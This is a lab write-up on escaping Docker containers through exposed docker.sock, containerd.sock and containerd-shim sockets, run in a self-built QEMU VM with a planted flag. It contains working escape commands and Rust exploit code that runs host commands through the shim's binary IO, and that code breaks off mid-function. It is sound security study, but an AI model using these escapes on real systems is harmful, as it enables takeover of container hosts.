Docker Escape Notes
Environment Setup
I planned to use a VM, so I built a rootfs with buildroot, plus a default kernel image. buildroot lets you select docker-cli and docker-engine directly (the docker compose checksum seems to be off; after tweaking it it works — it's only a VM anyway), and it pulls in the dependencies automatically. For the kernel you can use the one it provides, or compile your own / download another. Here I start from buildroot/board/qemu/x86_64/linux.config and modify it.
docker needs network access to build images, so add the qemu options -device virtio-net-pci,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222-:22. Set the DHCP network interface name (BR2_SYSTEM_DHCP) to eth0, so the generated inittab contains a dhcp command and an IP is obtained automatically. Also enable ca-certificates, otherwise HTTPS is unusable. Since runc currently lacks pivot_root support on ramfs (see rootfs: make pivot_root(2) dance handle initramfs case by cyphar · Pull Request #4434 · opencontainers/runc), the filesystem here is btrfs (my host kernel lacks ext4, which makes mounting and editing the image awkward). Also, qemu's tty (or whatever it is) doesn't wrap lines once output exceeds the screen width, which makes reading output painful, so I installed dropbear to ssh in (hence the port 22 forward above).
The final directory layout:
.
├── buildroot
├── playground
├── disk.qcow2
└── Makefile
The Makefile:
IMAGES_DIR := $(shell pwd)/buildroot/output/images
ROOT_DIR := $(shell pwd)/playground
DISK_RAW := $(shell pwd)/disk.raw
DISK := $(shell pwd)/disk.qcow2
.PHONY: all clean world menuconfig linux-menuconfig disk run
all: world
linux-menuconfig:
$(MAKE) -C buildroot linux-menuconfig
# TODO: auto detect config file and copy it to buildroot/.linux.config
cp ./buildroot/output/build/linux-6.12.10/.config ./buildroot/.linux.config
disk:
rm -f $(DISK)
qemu-img create -f raw $(DISK_RAW) 1G
doas losetup /dev/loop1 $(DISK_RAW)
doas mkdir -p ./mnt/{disk,rootfs}
doas mount -o loop $(IMAGES_DIR)/rootfs.btrfs ./mnt/rootfs/
doas mkfs.btrfs /dev/loop1
doas mount /dev/loop1 ./mnt/disk
doas rsync -a ./mnt/rootfs/ ./mnt/disk/
cd ./mnt/disk && \
doas sed -i '$$a\root /root 9p trans=virtio,version=9p2000.L,rw 0 0' ./etc/fstab && \
echo "flag{escaped}" | doas tee ./flag && \
cd ..
doas umount ./mnt/disk
doas umount ./mnt/rootfs
doas losetup -d /dev/loop1
doas rm -r ./mnt
qemu-img convert -f raw -O qcow2 $(DISK_RAW) $(DISK)
rm $(DISK_RAW)
world:
$(MAKE) -C buildroot
$(MAKE) disk
menuconfig:
$(MAKE) -C buildroot menuconfig
clean:
$(MAKE) -C buildroot clean
run:
qemu-system-x86_64 \
-cpu qemu64,+smap \
-m 4096M \
-enable-kvm \
-kernel $(IMAGES_DIR)/bzImage \
-append "root=/dev/vda rw console=ttyS0 loglevel=3 oops=panic panic=-1" \
-nographic \
-no-reboot \
-device virtio-net-pci,netdev=net0 \
-netdev user,id=net0,hostfwd=tcp::2222-:22 \
-virtfs local,path=$(ROOT_DIR),mount_tag=root,security_model=mapped,id=root \
-drive file=$(DISK),format=qcow2,if=virtio,id=rootfs,index=0,media=disk
Mounted Socket
Docker Architecture
Containers use a split architecture: the docker command is only a frontend, and the daemons dockerd and containerd do the actual container management. The architecture looks like this:
graph TD A[Docker CLI] --> B["Docker Engine (dockerd)"] B --> C[containerd] C --> D[containerd-shim] D --> E[runC] C --> F[containerd-shim] F --> G[runC] C --> H[containerd-shim] H --> I[runC]
What dockerd actually calls is containerd's gRPC API. containerd manages the container lifecycle, images, storage, networking, and so on — containerd is the core of the stack. containerd-shim is the vehicle that runs a container: every container start spawns one containerd-shim process, which uses runC's API to actually create and run the container.
The flow of docker run:
- the docker client sends the command to dockerd (over its HTTP API on docker.sock)
- dockerd checks whether the image exists locally; if so, it continues and requests container creation from the host OS
- a containerd-shim process is started, and the namespaces and cgroups are created
- containerd-shim receives three parameters (container id, bundle directory, and the runtime binary runC) and calls runC's API
- runC unpacks the image, generates the container config, and starts the container
sequenceDiagram participant DOCKERD participant CONTAINERD participant CONTAINERD_SHIM participant RUNC DOCKERD->>CONTAINERD: send REQUEST over gRPC CONTAINERD->>CONTAINERD_SHIM: invoke shim start/exec CONTAINERD_SHIM->>RUNC: invoke runc create/start/exec RUNC-->>CONTAINERD_SHIM: CONTAINERD_SHIM-->>CONTAINERD: CONTAINERD-->>DOCKERD: send RESPONSE over gRPC CONTAINERD->>RUNC: runc interaction: state, top, etc. RUNC-->>CONTAINERD: (no idea why leaving this label empty triggers an error)
docker.sock
dockerd binds the unix socket /var/run/docker.sock by default and communicates over it. In scenarios where docker is managed from inside a container, this socket may be mapped in, which makes it possible to drive the host's container management from within the container.
Write a Dockerfile and compose file like the following:
FROM alpine:latest
RUN apk add --no-cache docker curlie
services:
app:
build: .
entrypoint: ["/bin/ash"]
stdin_open: true
tty: true
volumes:
- /var/run/docker.sock:/var/run/docker.sock
Then start the container, enter it, and use the docker command as usual to drive the host's docker daemon. The escape is therefore: start a new container with the host's root directory mapped in, and read the flag.
/ # docker run -it --rm -v /:/host/ alpine ash
/ # ls
bin etc host media opt root sbin sys usr
dev home lib mnt proc run srv tmp var
/ # cd /host
/host # ls
bin flag linuxrc proc sys
crond.reboot init media root tmp
dev lib mnt run usr
etc lib64 opt sbin var
/host # cat flag
flag{escaped}
Strictly speaking this hasn't really "escaped": the ns and cgroup isolation still applies, and caps still constrain us. But since the docker command is available, a new container can be started with settings that make it use the host's namespaces and cgroups, with security mechanisms such as apparmor and seccomp disabled, with extra caps granted, and so on. For example:
/ # docker run -it --rm -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host alpine ash
/ # ls
bin etc host media opt root sbin sys usr
dev home lib mnt proc run srv tmp var
/ # ps aux
PID USER TIME COMMAND
1 root 0:00 init
2 root 0:00 [kthreadd]
3 root 0:00 [pool_workqueue_]
4 root 0:00 [kworker/R-rcu_g]
5 root 0:00 [kworker/R-sync_]
6 root 0:00 [kworker/R-slub_]
7 root 0:00 [kworker/R-netns]
10 root 0:00 [kworker/0:0H-ev]
12 root 0:00 [kworker/R-mm_pe]
13 root 0:00 [rcu_tasks_kthre]
14 root 0:00 [ksoftirqd/0]
15 root 0:00 [rcu_preempt]
16 root 0:00 [rcu_exp_par_gp_]
17 root 0:00 [rcu_exp_gp_kthr]
18 root 0:00 [migration/0]
19 root 0:00 [cpuhp/0]
20 root 0:00 [kdevtmpfs]
21 root 0:00 [kworker/R-inet_]
22 root 0:00 [kauditd]
23 root 0:00 [kworker/u4:1-ev]
24 root 0:00 [oom_reaper]
25 root 0:00 [kworker/R-write]
26 root 0:00 [kcompactd0]
27 root 0:00 [kworker/R-kbloc]
28 root 0:00 [irq/9-acpi]
29 root 0:00 [kworker/R-ata_s]
30 root 0:00 [kworker/R-md]
31 root 0:00 [kworker/R-md_bi]
33 root 0:00 [kworker/0:1H-kb]
34 root 0:00 [kworker/R-rpcio]
35 root 0:00 [kworker/R-xprti]
36 root 0:00 [kworker/R-cfg80]
38 root 0:00 [kswapd0]
39 root 0:00 [kworker/R-nfsio]
40 root 0:00 [kworker/R-acpi_]
41 root 0:00 [scsi_eh_0]
42 root 0:00 [kworker/R-scsi_]
43 root 0:00 [scsi_eh_1]
44 root 0:00 [kworker/R-scsi_]
46 root 0:00 [kworker/R-mld]
47 root 0:00 [kworker/R-ipv6_]
57 root 0:00 [jbd2/vda-8]
58 root 0:00 [kworker/R-ext4-]
73 root 0:00 /sbin/syslogd -n
77 root 0:00 /sbin/klogd -n
165 root 0:00 udhcpc -t1 -A3 -b -R -O search -O staticroutes -p /var/run
170 root 0:00 /usr/sbin/crond -f
174 root 0:00 {dockerd-syslog-} /bin/sh /usr/libexec/dockerd-syslog-wrap
176 root 0:22 /usr/bin/dockerd --pidfile /var/run/dockerd.pid
177 root 0:00 {dockerd-syslog-} /bin/sh /usr/libexec/dockerd-syslog-wrap
187 root 0:05 containerd --config /var/run/docker/containerd/containerd.
924 root 0:00 -sh
1460 root 0:00 [kworker/0:0-eve]
2012 root 0:00 [kworker/u4:0-ev]
2634 root 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id ec478
2667 root 0:00 /bin/ash
2696 root 0:00 docker compose run app
2708 root 0:01 /usr/lib/docker/cli-plugins/docker-compose compose run app
2737 root 0:02 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c186f
2771 root 0:00 /bin/ash
2891 root 0:00 [kworker/u4:2-ev]
2908 root 0:00 [kworker/0:1-eve]
3047 root 0:00 [kworker/0:2-eve]
3093 root 0:00 docker run -it --rm -v /:/host/ --cap-add=ALL --security-o
3112 root 0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id 795b7
3144 root 0:00 ash
3168 root 0:00 ps aux
This is effectively full control of the host.
(Though the simpler route is to write a cron job that pops a reverse shell, haha.)
If the mapped-in socket is not at the default location, point the client at it with -H unix:///path/to/docker.sock. (If even the filename was changed, it seems the only option is to try files one by one.)
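Hunting for a renamed socket can be automated by walking the filesystem for socket-type files. A minimal sketch (the search roots and depth limit are arbitrary assumptions):

```rust
use std::fs;
use std::os::unix::fs::FileTypeExt;
use std::path::Path;

// Recursively collect socket-type files under `dir`, up to `depth` levels deep.
// Unreadable directories (procfs, permission errors) are silently skipped.
fn find_sockets(dir: &Path, depth: u32) -> Vec<String> {
    let mut found = Vec::new();
    if depth == 0 {
        return found;
    }
    let Ok(entries) = fs::read_dir(dir) else {
        return found;
    };
    for entry in entries.flatten() {
        let path = entry.path();
        match entry.file_type() {
            Ok(t) if t.is_socket() => found.push(path.to_string_lossy().into_owned()),
            // symlinks are not followed, so no risk of loops
            Ok(t) if t.is_dir() => found.extend(find_sockets(&path, depth - 1)),
            _ => {}
        }
    }
    found
}

fn main() {
    // Likely hiding spots for a remapped docker.sock.
    for base in ["/run", "/var/run", "/tmp"] {
        for s in find_sockets(Path::new(base), 3) {
            println!("{s}");
        }
    }
}
```

Each candidate can then be tried with -H unix://<path> until one answers like a docker daemon.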
Even if there is no docker binary inside the container, it doesn't matter — other channels work too, e.g. the HTTP API directly:
/ # curlie --unix-socket /var/run/docker.sock GET http://localhost/containers/json
[
{
"Id": "6df5480c6d2ecd5ba05eee50e026e1d199560d30453a534e3b447a1ebc752bf6",
"Names": [
"/socket-app-run-ab55dc606bb9"
],
"Image": "alpine:latest",
"ImageID": "sha256:8a87ea05ce928fc576af504b9e838b12312274c4e39c7de784d30bc2
"Command": "/bin/ash",
"Created": 1736324068,
"Ports": [
],
"Labels": {
"com.docker.compose.config-hash": "1787a2ee9fcd2a21d4a5c22008bb8da1d54c
"com.docker.compose.container-number": "1",
"com.docker.compose.depends_on": "",
"com.docker.compose.image": "sha256:8a87ea05ce928fc576af504b9e838b12312
"com.docker.compose.oneoff": "True",
"com.docker.compose.project": "socket",
"com.docker.compose.project.config_files": "/root/socket/docker-compose
"com.docker.compose.project.working_dir": "/root/socket",
"com.docker.compose.service": "app",
"com.docker.compose.slug": "ab55dc606bb97468ca39af4bcfbabe3b54a63395d13
"com.docker.compose.version": "2.29.7"
},
"State": "running",
"Status": "Up About a minute",
"HostConfig": {
"NetworkMode": "socket_default"
},
"NetworkSettings": {
"Networks": {
"socket_default": {
"IPAMConfig": null,
"Links": null,
"Aliases": null,
"MacAddress": "02:42:ac:12:00:03",
"DriverOpts": null,
"NetworkID": "bb363fb6dc0ca84ea1859ec4c476f4c573008862d77378bc7
"EndpointID": "afa93e331bb45250fe7b5ef8931914ed2096a2c8a68c334e
"Gateway": "172.18.0.1",
"IPAddress": "172.18.0.3",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"DNSNames": null
}
}
},
"Mounts": [
{
"Type": "bind",
"Source": "/var/run/docker.sock",
"Destination": "/var/run/docker.sock",
"Mode": "rw",
"RW": true,
"Propagation": "rprivate"
}
]
},
{
"Id": "0d217c3631c47832c8391337670d1e0915057ea2ca910de3402620c2e2acbc26",
"Names": [
"/socket-app-1"
],
"Image": "alpine:latest",
"ImageID": "sha256:8a87ea05ce928fc576af504b9e838b12312274c4e39c7de784d30bc2
"Command": "/bin/ash",
"Created": 1736324010,
"Ports": [
],
"Labels": {
"com.docker.compose.config-hash": "07f59ca7fad1bdad505feb0e11fdd72aa356
"com.docker.compose.container-number": "1",
"com.docker.compose.depends_on": "",
"com.docker.compose.image": "sha256:8a87ea05ce928fc576af504b9e838b12312
"com.docker.compose.oneoff": "False",
"com.docker.compose.project": "socket",
"com.docker.compose.project.config_files": "/root/socket/docker-compose
"com.docker.compose.project.working_dir": "/root/socket",
"com.docker.compose.service": "app",
"com.docker.compose.version": "2.29.7"
},
"State": "running",
"Status": "Up About a minute",
"HostConfig": {
"NetworkMode": "socket_default"
},
"NetworkSettings": {
"Networks": {
"socket_default": {
"IPAMConfig": null,
"Links": null,
"Aliases": null,
"MacAddress": "02:42:ac:12:00:02",
"DriverOpts": null,
"NetworkID": "bb363fb6dc0ca84ea1859ec4c476f4c573008862d77378bc7
"EndpointID": "fdda29be5bab686b462f722fa82413c9a8aafb8457c2616c
"Gateway": "172.18.0.1",
"IPAddress": "172.18.0.2",
"IPPrefixLen": 16,
"IPv6Gateway": "",
"GlobalIPv6Address": "",
"GlobalIPv6PrefixLen": 0,
"DNSNames": null
}
}
},
"Mounts": [
{
"Type": "bind",
"Source": "/var/run/docker.sock",
"Destination": "/var/run/docker.sock",
"Mode": "rw",
"RW": true,
"Propagation": "rprivate"
}
]
}
]
HTTP/1.1 200 OK
Api-Version: 1.47
Content-Type: application/json
Docker-Experimental: false
Ostype: linux
Server: Docker/27.3.1 (linux)
Date: Wed, 08 Jan 2025 08:16:16 GMT
Transfer-Encoding: chunked
Further operations can be looked up in the API docs; I won't bother trying container creation and the like here.
port
A dockerd managed by systemd can additionally be configured to expose the API on port 2375 (plaintext) and 2376 (TLS). If the container can reach the host network (--net=host), or the host exposes the port publicly, the daemon can be driven through it; with the docker CLI it works just like above — connect with -H tcp://host:2376.
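The TCP endpoint is plain HTTP, so it can also be driven without the docker CLI by writing the request by hand. A minimal sketch against the plaintext 2375 port (the host address is an assumption):

```rust
use std::io::{Read, Write};
use std::net::TcpStream;

// Build a minimal HTTP/1.1 request for the Docker Engine API.
fn build_request(host: &str, path: &str) -> String {
    format!("GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n")
}

fn main() {
    let host = "172.17.0.1:2375"; // assumed: default bridge gateway, plaintext port
    let req = build_request(host, "/containers/json");
    match TcpStream::connect(host) {
        Ok(mut stream) => {
            stream.write_all(req.as_bytes()).expect("write failed");
            let mut resp = String::new();
            stream.read_to_string(&mut resp).expect("read failed");
            println!("{resp}");
        }
        Err(e) => eprintln!("connect failed: {e}"),
    }
}
```

On success this prints the same /containers/json listing as the curlie example above.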
containerd.sock
If containerd.sock is mapped in, we can likewise talk to it directly to create a container and escape. Options: containerd's own CLI ctr, friendlier tools such as nerdctl, or even hand-written gRPC calls.
The compose file:
services:
containerd:
build: .
entrypoint: ["/bin/ash"]
stdin_open: true
tty: true
cap_add:
- SYS_ADMIN
network_mode: host
volumes:
- /var/run/docker/containerd/containerd.sock:/var/run/docker/containerd/containerd.sock
- /var/lib/docker/containerd:/var/lib/docker/containerd
However, docker does not store its containers through containerd (see reference), so nerdctl cannot see the images. Containers are visible, though under a separate namespace:
/ # nerdctl -a /var/run/docker/containerd/containerd.sock namespace ls
NAME CONTAINERS IMAGES VOLUMES LABELS
default 0 0 0
moby 1 0 0
/ # nerdctl -a /var/run/docker/containerd/containerd.sock -n moby ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
50ed2f6cabbf "/bin/ash" 16 minutes ago Up
/ # docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
50ed2f6cabbf socket-app "/bin/ash" 16 minutes ago Up 16 minutes socket-app-run-5e4ecb87c5a0
Pulling images succeeds, but creating a container still fails:
FATA[0000] failed to mount {Type:bind Source:/var/lib/docker/containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/4/fs Target: Options:[ro rbind]} on "/tmp/initialC2772891160": operation not permitted
This needs mount permission (the SYS_ADMIN capability), and /var/lib/docker/containerd/ must also be mapped into the container. (Not sure why the host-side containerd doesn't resolve the path on the host.)
Yet another problem appears:
FATA[0000] failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: failed to fulfil mount request: open /var/lib/nerdctl/55e780ce/containers/default/d832666b196df5a9dd64bd38453d590aa5e7b7464249e7092a41d665f55584b9/resolv.conf: no such file or directory: unknown
Switching to ctr: create the container and start it:
/ # ctr -a /var/run/docker/containerd/containerd.sock container create --runtime io.containerd.runc.v2 --mount type=bind,source=/,destination=/host docker.io/library/alpine:latest test /bin/ash
/ # ctr -a /var/run/docker/containerd/containerd.sock task start test
ctr: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error jailing process inside rootfs: pivot_root .: invalid argument: unknown
pivot_root fails for the same reason as with docker: the rootfs is a ramfs. Start the task with the --no-pivot flag:
/ # ctr -a /var/run/docker/containerd/containerd.sock task start --no-pivot test
ctr: failed to create shim task: failed to open stdin fifo /run/containerd/fifo/533476447/test-stdin: stat /run/containerd/fifo/533476447/test-stdin: no such file or directory: unknown
Now the fifo cannot be operated on either. I did find a writeup that bypasses this problem:
namely, don't use interactive stdin — pop a reverse shell instead.
And it breaks again: mounting works at create time, but task start errors out, and I don't know how to fix this one:
ctr: failed to create shim task: OCI runtime create failed: runc create failed: unable to start container process: error during container init: error mounting "/" to rootfs at "/host": mount src=/, dst=/host, dstFd=/proc/thread-self/fd/8: no such device: unknown
(Exasperating — a fresh machine running only containerd throws the same error; the closest issue I can find is this one, but they say it's not a containerd or runc problem.)
Pausing here for now; being able to control other containers counts as an escape too (surely).
containerd-shim.sock
There is a related CVE: CVE-2020-15257 (containerd-shim API exposed to host network containers · Advisory · containerd/containerd). In older containerd versions, under --net host the container shares the network namespaces with the host, and access to the abstract unix socket was not restricted — abstract sockets are not isolated by the mount namespace. The official fix replaced the abstract socket with a filesystem socket, which is subject to mount namespace isolation.
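Abstract sockets appear in /proc/net/unix with a leading @ in the path column, so whether a shim socket is visible from inside the container can be checked by parsing that file. A minimal sketch (the @/containerd-shim/... name pattern for pre-fix shims is an assumption):

```rust
use std::fs;

// Extract abstract unix socket names (path column starting with '@')
// from /proc/net/unix-formatted text. Columns are:
// Num RefCount Protocol Flags Type St Inode Path
fn abstract_sockets(proc_net_unix: &str) -> Vec<String> {
    proc_net_unix
        .lines()
        .skip(1) // header line
        .filter_map(|line| line.split_whitespace().nth(7)) // 8th column: path (may be absent)
        .filter(|path| path.starts_with('@'))
        .map(|s| s.to_string())
        .collect()
}

fn main() {
    match fs::read_to_string("/proc/net/unix") {
        Ok(data) => {
            for name in abstract_sockets(&data) {
                // pre-fix shims listened on something like
                // @/containerd-shim/<namespace>/<id>/shim.sock (assumed pattern)
                if name.contains("containerd-shim") {
                    println!("reachable shim socket: {name}");
                }
            }
        }
        Err(e) => eprintln!("cannot read /proc/net/unix: {e}"),
    }
}
```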
Here containerd-shim.sock is mapped into the container to reproduce the idea; the compose file:
services:
shim:
image: alpine:latest
entrypoint: ["/bin/ash"]
stdin_open: true
tty: true
volumes:
- /var/run/containerd/s/:/var/run/containerd/s/
First we need to learn how containerd-shim communicates. The shim speaks ttrpc (a lightweight gRPC variant); the API is as follows:
service Task {
rpc State(StateRequest) returns (StateResponse);
rpc Create(CreateTaskRequest) returns (CreateTaskResponse);
rpc Start(StartRequest) returns (StartResponse);
rpc Delete(DeleteRequest) returns (DeleteResponse);
rpc Pids(PidsRequest) returns (PidsResponse);
rpc Pause(PauseRequest) returns (google.protobuf.Empty);
rpc Resume(ResumeRequest) returns (google.protobuf.Empty);
rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty);
rpc Kill(KillRequest) returns (google.protobuf.Empty);
rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty);
rpc ResizePty(ResizePtyRequest) returns (google.protobuf.Empty);
rpc CloseIO(CloseIORequest) returns (google.protobuf.Empty);
rpc Update(UpdateTaskRequest) returns (google.protobuf.Empty);
rpc Wait(WaitRequest) returns (WaitResponse);
rpc Stats(StatsRequest) returns (StatsResponse);
rpc Connect(ConnectRequest) returns (ConnectResponse);
rpc Shutdown(ShutdownRequest) returns (google.protobuf.Empty);
}
We can test with Pids. Officially a Go client API is provided; I don't write Go, so Rust it is.
PidsRequest takes an id — here it is the container id (figured out by testing; presumably that's just how docker organizes things, and when using ctr yourself you could pick different ids). Inside the container it can be read directly with cat /proc/self/cgroup, e.g.:
/ # cat /proc/self/cgroup
13:debug:/
12:misc:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
11:rdma:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
10:pids:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
9:hugetlb:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
8:net_prio:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
7:perf_event:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
6:net_cls:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
5:freezer:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
4:devices:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
3:blkio:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
2:cpuacct:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
1:cpu:/docker/c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071
use std::fs;
use containerd_shim_protos::{
api::PidsRequest,
ttrpc::context::{self, Context},
Client, TaskClient,
};
fn find_shim_sockets() -> Vec<String> {
fs::read_dir("/run/containerd/s/")
.expect("Failed to read /run/containerd/s/")
.filter_map(|entry| entry.ok())
.map(|entry| entry.path().to_string_lossy().to_string())
.collect()
}
fn get_container_id() -> Result<String, std::io::Error> {
let cgroup = fs::read_to_string("/proc/1/cgroup").expect("Failed to read /proc/1/cgroup");
for line in cgroup.lines() {
if line.contains("docker") {
let parts: Vec<&str> = line.split('/').collect();
return parts
.last()
.map(|s| s.to_string())
.ok_or(std::io::Error::new(
std::io::ErrorKind::NotFound, line));
}
}
Err(std::io::Error::new(std::io::ErrorKind::NotFound, cgroup))
}
fn main() {
for socket in find_shim_sockets() {
let sockaddr = format!("unix://{socket}");
println!("connecting to {}", sockaddr);
let client = Client::connect(&sockaddr).expect("Failed to connect to shim");
let task = TaskClient::new(client);
println!("requesting pids for {}", socket);
let container_id = get_container_id().expect("Failed to get container id");
let mut pids_req = PidsRequest::new();
pids_req.set_id(container_id);
let pids_resp = task
.pids(context::with_timeout(0), &pids_req)
.expect("Failed to get pids");
println!("pids: {:#?}", pids_resp);
}
}
The output:
connecting to unix:///run/containerd/s/ddb23e1e1b639b0cc4a313a92f318ccbc7c0ef9c4b77bbe99a806b523172733c
requesting pids for /run/containerd/s/ddb23e1e1b639b0cc4a313a92f318ccbc7c0ef9c4b77bbe99a806b523172733c
pids: PidsResponse {
processes: [
ProcessInfo {
pid: 682,
info: MessageField(
None,
),
special_fields: SpecialFields {
unknown_fields: UnknownFields {
fields: None,
},
cached_size: CachedSize {
size: 0,
},
},
},
ProcessInfo {
pid: 939,
info: MessageField(
None,
),
special_fields: SpecialFields {
unknown_fields: UnknownFields {
fields: None,
},
cached_size: CachedSize {
size: 0,
},
},
},
],
special_fields: SpecialFields {
unknown_fields: UnknownFields {
fields: None,
},
cached_size: CachedSize {
size: 0,
},
},
}
We have successfully connected to the host's shim socket and communicated with it. On the host you can see that pid 682 above is the process inside docker (the ash started here), and its parent is containerd-shim:
# ps -o pid,ppid,args | grep -E "PID|$(ps -o pid,ppid,args | grep 682 | head -n -1 | awk '{print $2}')"
PID PPID COMMAND
650 1 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c317a59fa217a336b03d65e3a304312c20f46cde8a3965363297f92649662071 -address /var/run/docker/containerd/containerd.sock
682 650 /bin/ash
Now for exploitation. When running a task, there are two places where host commands can be executed directly: the IO can be set to a program, and hooks can be configured to run programs.
IO
containerd supports setting the IO to a binary, achieving a redirection-like effect — e.g. recording container output into a logging program such as journald. The relevant code:
// BinaryIO forwards container STDOUT|STDERR directly to a logging binary
func BinaryIO(binary string, args map[string]string) Creator {
return func(_ string) (IO, error) {
uri, err := LogURIGenerator("binary", binary, args)
if err != nil {
return nil, err
}
res := uri.String()
return &logURI{
config: Config{
Stdout: res,
Stderr: res,
},
}, nil
}
}
So we can create a task with its stdout set to a binary IO, which executes an arbitrary command on the host — e.g. a reverse shell.
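The stdout field is a URI: a binary scheme, the program path, and its arguments in the query string. A minimal sketch of constructing such a payload (the spaces-to-%20 substitution is a crude stand-in for full URL encoding, matching what the exp does):

```rust
// Build a binary:// log URI that makes containerd-shim spawn `binary`
// with `flag=arg` as its argument when the task's stdout is opened.
fn binary_io_uri(binary: &str, flag: &str, arg: &str) -> String {
    let encoded = arg.replace(' ', "%20"); // crude percent-encoding, spaces only
    format!("binary://{binary}?{flag}={encoded}")
}

fn main() {
    let uri = binary_io_uri("/bin/sh", "-c", "docker cp /flag abc123:/");
    println!("{uri}");
}
```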
First, the parameters needed to create a task:
message CreateTaskRequest {
string id = 1;
string bundle = 2;
repeated containerd.types.Mount rootfs = 3;
bool terminal = 4;
string stdin = 5;
string stdout = 6;
string stderr = 7;
string checkpoint = 8;
string parent_checkpoint = 9;
google.protobuf.Any options = 10;
}
Per OCI, id and bundle are required: id is the one discussed above, and bundle is the container's configuration, following the OCI spec; fields left empty fall back to what the bundle specifies. The id can be chosen freely. If the bundle is taken directly from what docker set up at container start (/run/docker/containerd/daemon/io.containerd.runtime.v2.task/moby/{container_id}/config.json), current versions report the following error:
Failed to create task: RpcStatus(Status { code: UNKNOWN, message: "OCI runtime create failed: runc create failed: container's cgroup is not empty: 2 process(es) found", details: [], special_fields: SpecialFields { unknown_fields: UnknownFields { fields: None }, cached_size: CachedSize { size: 0 } } })
It complains the cgroup is not empty, so we have to supply our own config. The host can access the container's filesystem, so the bundle can be written inside the container's filesystem. Concretely: docker uses overlayfs by default, and inside the container /etc/mtab shows the rootfs mapping, e.g.:
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/OZM73XA67KI3RI5ZIOLNDRSAYH:/var/lib/docker/overlay2/l/CFJLUZAW4E44SPONRAFFOYETHV:/var/lib/docker/overlay2/l/UKJT4TRNQILRFI44Y4LLNH7BOK,upperdir=/var/lib/docker/overlay2/42e61d37a5c08ecbb4a9fc4385d4f0cbec3cddb6f5e1e9959a92e02d409a22c8/diff,workdir=/var/lib/docker/overlay2/42e61d37a5c08ecbb4a9fc4385d4f0cbec3cddb6f5e1e9959a92e02d409a22c8/work 0 0
overlayfs is layered; on the host, accessing /var/lib/docker/overlay2/{overlay_id}/merged reaches the container's rootfs. diff works too — it holds the newly added/modified files.
Take an existing container's config.json and modify it: fix up the container id and root path, point cgroupsPath at some other path, and finally write it to e.g. /tmp/config.json inside the container, so that the bundle path on the host becomes /var/lib/docker/overlay2/{overlay_id}/merged/tmp/.
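For reference, the bundle's config.json follows the OCI runtime spec. A heavily trimmed sketch of the fields that matter here (the values are assumptions; a real bundle should start from the container's existing config.json, which also carries the required mounts, capabilities, and namespaces):

```json
{
  "ociVersion": "1.1.0",
  "process": {
    "terminal": true,
    "user": { "uid": 0, "gid": 0 },
    "args": [ "/bin/sh" ],
    "cwd": "/"
  },
  "root": {
    "path": "/var/lib/docker/overlay2/{{OVERLAY_ID}}/merged"
  },
  "linux": {
    "cgroupsPath": "/some-empty-cgroup"
  }
}
```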
Right on cue, another error:
Failed to create task: RpcStatus(Status { code: UNKNOWN, message: "OCI runtime create failed: runc create failed: cannot allocate tty if runc will detach without setting console socket", details: [], special_fields: SpecialFields { unknown_fields: UnknownFields { fields: None }, cached_size: CachedSize { size: 0 } } })
Here the terminal option in the request must be set to true; then it is not treated as a detach, and no console socket has to be created.
Here the payload uses the host's docker cp to copy /flag into the container. The exp:
use std::{fs, path::Path};
use containerd_shim_protos::{
api::{CreateTaskRequest, CreateTaskResponse, PidsRequest, PidsResponse},
protobuf::{self, Message, MessageDyn},
shim::oci::Options,
ttrpc::context::{self, Context},
Client, TaskClient,
};
fn find_shim_sockets() -> Vec<String> {
fs::read_dir("/run/containerd/s/")
.expect("Failed to read /run/containerd/s/")
.filter_map(|entry| entry.ok())
.map(|entry| entry.path().to_string_lossy().to_string())
.collect()
}
fn get_container_id() -> String {
let cgroup = fs::read_to_string("/proc/1/cgroup").expect("Failed to read /proc/1/cgroup");
for line in cgroup.lines() {
if line.contains("docker") {
let parts: Vec<&str> = line.split('/').collect();
return parts
.last()
.expect("Failed to get last part of cgroup line")
.to_string();
}
}
panic!("Failed to find container id in /proc/1/cgroup: {}", cgroup);
}
fn get_overlayfs() -> String {
fs::read_to_string("/etc/mtab")
.expect("Failed to read /etc/mtab")
.lines()
.next()
.expect("Failed to get first line of /etc/mtab")
.split(',')
.find(|part| part.contains("workdir="))
.expect("Failed to find overlayfs workdir")
.split_whitespace()
.next()
.expect("Failed to get overlayfs workdir")
.split('=')
.last()
.expect("Failed to get overlayfs workdir")
.replace("work", "merged")
}
fn get_overlay_id() -> String {
let overlay_path = get_overlayfs();
overlay_path
.split('/')
.nth_back(1)
.expect("Failed to get last part of overlayfs path")
.to_string()
}
fn main() {
for socket in find_shim_sockets() {
let sockaddr = format!("unix://{socket}");
println!("connecting to {}", sockaddr);
let client = Client::connect(&sockaddr).expect("Failed to connect to shim");
